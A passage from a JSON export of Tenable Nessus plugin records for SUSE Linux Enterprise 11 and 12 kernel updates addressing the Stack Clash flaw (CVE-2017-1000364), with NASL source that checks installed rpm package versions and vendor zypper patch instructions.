SUSE-SU-2017:1696-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101061);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES11 Security Update : kernel-source (SUSE-SU-2017:1696-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This Linux kernel update for SUSE Linux Enterprise 11 SP4 fixes the\nfollowing issues :\n\n - A previous security update to address CVE-2017-1000364\n caused unintended side-effects in several other tools,\n most notably Java. These issues have been remedied.\n [bsc#1045340, bsc#1045406]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045406\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171696-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d624f3bc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-kernel-source-13172=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-kernel-source-13172=1\n\nSUSE Linux Enterprise Server 11-EXTRA:zypper in -t patch\nslexsp3-kernel-source-13172=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-kernel-source-13172=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-default-man-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-base-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-default-devel-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-source-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-syms-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-base-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"kernel-trace-devel-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-base-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-ec2-devel-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-base-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-xen-devel-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-base-3.0.101-107.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"i586\", reference:\"kernel-pae-devel-3.0.101-107.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-source\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:20", "description": "This Linux kernel update for SUSE Linux Enterprise 12 fixes the following issues :\n\n - A previous security update to address CVE-2017-1000364 caused unintended side-effects in several other tools, most notably Java. These issues have been remedied.\n [bsc#1045340]\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-30T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1735-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_80-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_80-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1735-1.NASL", "href": "https://www.tenable.com/plugins/nessus/101144", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1735-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101144);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1735-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This Linux kernel update for SUSE Linux Enterprise 12 fixes the\nfollowing issues :\n\n - A previous security update to address CVE-2017-1000364\n caused unintended side-effects in several other tools,\n most notably Java. These issues have been remedied.\n [bsc#1045340]\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1045340\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171735-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3bdeabc0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-1077=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-1077=1\n\nSUSE Linux Enterprise Module for Public Cloud 12:zypper in -t patch\nSUSE-SLE-Module-Public-Cloud-12-2017-1077=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_80-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_80-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/30\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_80-default-1-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_61-52_80-xen-1-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-debuginfo-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debuginfo-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debugsource-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-devel-3.12.61-52.80.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-syms-3.12.61-52.80.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:16", "description": "The SUSE Linux Enterprise 12 kernel was updated to receive various security and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000364: The default stack guard page was too small and could be 'jumped over' by userland programs using more than one page of stack in functions and so lead to memory corruption. This update extends the stack guard page to 1 MB (for 4k pages) and 16 MB (for 64k pages) to reduce this attack vector. This is not a kernel bugfix, but a hardening measure against this kind of userland attack.(bsc#1039348)\n\nThe update package also includes non-security fixes. See advisory for details.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-06-20T00:00:00", "type": "nessus", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1618-1) (Stack Clash)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000364"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:kernel-default", "p-cpe:/a:novell:suse_linux:kernel-default-base", "p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-default-debugsource", "p-cpe:/a:novell:suse_linux:kernel-default-devel", "p-cpe:/a:novell:suse_linux:kernel-default-man", "p-cpe:/a:novell:suse_linux:kernel-syms", "p-cpe:/a:novell:suse_linux:kernel-xen", "p-cpe:/a:novell:suse_linux:kernel-xen-base", "p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo", "p-cpe:/a:novell:suse_linux:kernel-xen-debugsource", "p-cpe:/a:novell:suse_linux:kernel-xen-devel", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-default", "p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-xen", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1618-1.NASL", "href": "https://www.tenable.com/plugins/nessus/100916", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1618-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100916);\n script_version(\"3.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000364\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:1618-1) (Stack Clash)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 kernel was updated to receive various\nsecurity and bugfixes. The following security bugs were fixed :\n\n - CVE-2017-1000364: The default stack guard page was too\n small and could be 'jumped over' by userland programs\n using more than one page of stack in functions and so\n lead to memory corruption. This update extends the stack\n guard page to 1 MB (for 4k pages) and 16 MB (for 64k\n pages) to reduce this attack vector. This is not a\n kernel bugfix, but a hardening measure against this kind\n of userland attack.(bsc#1039348)\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1039348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1042292\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000364/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20171618-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?cc9fddf2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2017-995=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2017-995=1\n\nSUSE Linux Enterprise Module for Public Cloud 12:zypper in -t patch\nSUSE-SLE-Module-Public-Cloud-12-2017-995=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'rsh_stack_clash_priv_esc.rb');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_61-52_77-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/20\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 